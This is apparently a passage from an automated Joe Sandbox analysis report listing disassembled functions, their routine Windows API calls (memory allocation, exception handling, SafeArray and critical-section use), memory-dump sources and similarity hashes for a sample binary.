Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Bound$DestroyElement
String ID:
API String ID: 3987547017-0
Opcode ID: dd062293a6d8c6408949b66926c8756efb9f561b464ddf5b0245895cac4737b0
Instruction ID: eec802be70f00b04b9d50dce94ad0465329a83e07a028fab2f1d79c53cdce0e1
Opcode Fuzzy Hash: dd062293a6d8c6408949b66926c8756efb9f561b464ddf5b0245895cac4737b0
Instruction Fuzzy Hash: B941FD75A0414AAFDF00DF98C884EAEB7B8FB49750F10C669F919E7241D730EA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6D065A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D065ACB
__CxxThrowException@8.LIBCMT ref: 6D065AE0
std::exception::exception.LIBCMT ref: 6D065B18
__CxxThrowException@8.LIBCMT ref: 6D065B2D

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc
String ID:
API String ID: 3153320871-0
Opcode ID: b0566f603b9bbc6c31087cb6ea0ed84764c265bb89b5d4925bfc472cac2ba856
Instruction ID: 6b4401bddc5fe02a1efce5ae251205f422c146d07b0e107e8ec85ada8d86f908
Opcode Fuzzy Hash: b0566f603b9bbc6c31087cb6ea0ed84764c265bb89b5d4925bfc472cac2ba856
Instruction Fuzzy Hash: 4D3195B5904609AFD704DF94D940A9EBBF8FF48754F11826EE91997740EB30E904CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D098D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D098D8A

Part of subcall function 6D0C9D66: __FF_MSGBANNER.LIBCMT ref: 6D0C9D7F
Part of subcall function 6D0C9D66: __NMSG_WRITE.LIBCMT ref: 6D0C9D86
Part of subcall function 6D0C9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D0C9BD4,6D061290,400BD10B), ref: 6D0C9DAB

Part of subcall function 6D0C91F6: std::_Lockit::_Lockit.LIBCPMT ref: 6D0C9202

_malloc.LIBCMT ref: 6D098DAF
std::exception::exception.LIBCMT ref: 6D098DD4
__CxxThrowException@8.LIBCMT ref: 6D098DEB

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
String ID:
API String ID: 3043633502-0
Opcode ID: d2a34ee646a92c6a8328f09ce96d9813ee1f4a39a1cf4a2a158b55e740929f1a
Instruction ID: 77dcde9e101fb21fb8f043920d951a3368cb588bd428bbddac1b26c4ffff2f40
Opcode Fuzzy Hash: d2a34ee646a92c6a8328f09ce96d9813ee1f4a39a1cf4a2a158b55e740929f1a
Instruction Fuzzy Hash: 4DF0F0728092126BF200EB95AC41BAF36E89F95759F41092CFE54A7240FB35D208C6F3

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C9BB5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D0C9BCF

Part of subcall function 6D0C9D66: __FF_MSGBANNER.LIBCMT ref: 6D0C9D7F
Part of subcall function 6D0C9D66: __NMSG_WRITE.LIBCMT ref: 6D0C9D86
Part of subcall function 6D0C9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D0C9BD4,6D061290,400BD10B), ref: 6D0C9DAB

std::exception::exception.LIBCMT ref: 6D0C9C04
std::exception::exception.LIBCMT ref: 6D0C9C1E
__CxxThrowException@8.LIBCMT ref: 6D0C9C2F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: 020de4eb42177c65a4546828d8608e21b5f88a4988140d4dcdc16df30e55bd0b
Instruction ID: 96c8f2b11bb7792e656a9e43057165eebd564c1bf6768d206ececa306e2a363d
Opcode Fuzzy Hash: 020de4eb42177c65a4546828d8608e21b5f88a4988140d4dcdc16df30e55bd0b
Instruction Fuzzy Hash: 82F0AF7240410ABEFF00EBA4EA50BAD7AF8AB4275DF110419E600A7291DFB0CA058693

Uniqueness

Uniqueness Score: -1.00%

Function 6D076C60 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6D076C73
SafeArrayAccessData.OLEAUT32(00000000,6D076C3C), ref: 6D076C87
_memmove.LIBCMT ref: 6D076C9A
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D076CA3

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
String ID:
API String ID: 3147195435-0
Opcode ID: bc4b648cb435ed51b0203fc463dbe28a573332129c695ac1f9ac944f5ef99d46
Instruction ID: 7226f30930f885d4202c989f6009d13f6b88d6a2529a96bfa3d31040cb85fd7c
Opcode Fuzzy Hash: bc4b648cb435ed51b0203fc463dbe28a573332129c695ac1f9ac944f5ef99d46
Instruction Fuzzy Hash: 5EF05E75204218BBEB106F91DC89F9B3BACEF8AB60F01C055FA198B240E771D5008BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D079110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D07913B
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D07915C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6D079170
LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6D079191

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 7f7f35b7c4439d89c49f424e891eeb7f5db1c73c5f8ff7f9b5063ab3cbadae58
Instruction ID: 8f6798f85a5c06a5332eb4c38013d2ee7ea417dd9ce0ec4fa9464a8a9cfdf0dd
Opcode Fuzzy Hash: 7f7f35b7c4439d89c49f424e891eeb7f5db1c73c5f8ff7f9b5063ab3cbadae58
Instruction Fuzzy Hash: A6416076900209DFDB14DF99D8849EEBBF4FF88310B11859ED916AB200D730EA15CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D065450 Relevance: 4.8, APIs: 3, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::tr1::_Xweak.LIBCPMT ref: 6D0656D7
std::exception::exception.LIBCMT ref: 6D065734
__CxxThrowException@8.LIBCMT ref: 6D06574B

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8ThrowXweak_mallocstd::exception::exceptionstd::tr1::_
String ID:
API String ID: 2092180293-0
Opcode ID: deea46f1a0ba0b1b26e1264590e5b09970195fbfa252d85f472d040cd89fb702
Instruction ID: 9d227e186bcd28b99434b2600a4b17147c212f0f497556e598838fb0feba48ea
Opcode Fuzzy Hash: deea46f1a0ba0b1b26e1264590e5b09970195fbfa252d85f472d040cd89fb702
Instruction Fuzzy Hash: EEA129B45087418FD720CF24D084A6ABBF6FF88714F158F4EE49A8B655E770EA48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D078E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6D078E89
LeaveCriticalSection.KERNEL32(?,00000000), ref: 6D078EAD
_memset.LIBCMT ref: 6D078ED2

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID:
API String ID: 3751686142-0
Opcode ID: ac75899336a1de6785ad609196360535f8c0f240c991c9e57fb15a9b9c09993b
Instruction ID: 93ea7a57821eb95657077bf5c5d4bdd37287febba5aeba322a29239f900839cb
Opcode Fuzzy Hash: ac75899336a1de6785ad609196360535f8c0f240c991c9e57fb15a9b9c09993b
Instruction Fuzzy Hash: E0516BB4600205AFDB58CF58C890F6AB7B6FF89304F108159E91A8B381DB31ED55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6D083A90 Relevance: 4.6, APIs: 3, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D083B71
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D083B83
SafeArrayDestroy.OLEAUT32(?), ref: 6D083BCF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy
String ID:
API String ID: 3651546500-0
Opcode ID: 1720f257d1a70e854f6a120f0c6d02b4411c12b4c3dd342b86dc967b950d4ae4
Instruction ID: 947867ac6eed7fb2a90fb087bc8f78217e269ea8c51796bebe17f8b01a3b6a95
Opcode Fuzzy Hash: 1720f257d1a70e854f6a120f0c6d02b4411c12b4c3dd342b86dc967b950d4ae4
Instruction Fuzzy Hash: 0D41ACB12086029FEB01CF58C880F6AF7E9FBC9754F104A0EFA94D7251D770E9468B92

Uniqueness

Uniqueness Score: -1.00%

Function 6D0869C0 Relevance: 4.6, APIs: 3, Instructions: 128COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D086A08
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D086A15
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D086A41

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: aa03804fdc6032be4d690033b0dda95081d00b477e95f01a98a9fe89468e8475
Instruction ID: 115c0ace9f708adda2f83f65c9be528ed6ba7e94062895f218808cb05c6d367a
Opcode Fuzzy Hash: aa03804fdc6032be4d690033b0dda95081d00b477e95f01a98a9fe89468e8475
Instruction Fuzzy Hash: 8841177561021A9FEF00DFA8C880FEA77B8EF49350F518659E9219B281D731E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D07DFB0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D07DFF6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D07E003
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D07E02F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 0ab5fc0d495c74c94ffd3cf410538bc0a939d857d01a26a4da68b055627e3448
Instruction ID: 15684b5c95a810de6a5d601e0c641d332b6839301e2ec20db7a21a3935b04c6c
Opcode Fuzzy Hash: 0ab5fc0d495c74c94ffd3cf410538bc0a939d857d01a26a4da68b055627e3448
Instruction Fuzzy Hash: E8410D75A0121ADFDB10DF98C8C4EEEB7B9FF49310B104669E525EB390D731A942CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6D07D920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6D07D949
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6D07D96C
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D07D9CF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: e5b9d5414095a7542a1e167051e253953f004a3674c3bb8c4280f32ffd7de950
Instruction ID: 5823c31d7bd9369021bd0a28f812f4d2effe838e176d6b2fb96f67bd6e9f5532
Opcode Fuzzy Hash: e5b9d5414095a7542a1e167051e253953f004a3674c3bb8c4280f32ffd7de950
Instruction Fuzzy Hash: B7214A35600215EFEB21CFA8C884FAB77A8EF8A740F104499E949DF244D7B1E901CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 6D07D9F0 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,?), ref: 6D07DA16
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6D07DA33
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D07DA9E

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 0187905abdae3e08d1ac4b7a04f5bc8ab342492fad0f0880a4a11e1292e4f853
Instruction ID: ba4cc285e945a45a769480220551b2fee93853f330eabac7c2cd219931aec41d
Opcode Fuzzy Hash: 0187905abdae3e08d1ac4b7a04f5bc8ab342492fad0f0880a4a11e1292e4f853
Instruction Fuzzy Hash: C5212A75604206EFF710DFA9C890FAA77A8BF8A704F104099EA05DB240D771E911CB74

Uniqueness

Uniqueness Score: -1.00%

Function 6D08DB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D08DB2D
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D08DB45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D08DBA2

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 5125dfaeb8a44dc33aa149525e3bcca3e9e5ab36be5ffc4ecebd186219c3cc1e
Instruction ID: ab7b90d53c9f938e51b634f4f661c3bcff9ae949ced1b793c98c39b114a1c87b
Opcode Fuzzy Hash: 5125dfaeb8a44dc33aa149525e3bcca3e9e5ab36be5ffc4ecebd186219c3cc1e
Instruction Fuzzy Hash: 1A116375645205AFEB00DF59C888F9ABBB8FF5E710F058299E918D7342D731D911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 032591D0 Relevance: 4.2, Strings: 3, Instructions: 460COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0325937C
$^q, xrefs: 032592D0
$^q, xrefs: 032592DC

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: Hbq$$^q$$^q
API String ID: 0-1611274095
Opcode ID: 900b47be57b3419a0c2c27e7183cf5f399327e644b8a63f077818c63664460d9
Instruction ID: e1d49d63311ea9b57c55d2e3c89dce847ba919d54b542dc89d9f5b2c65637afa
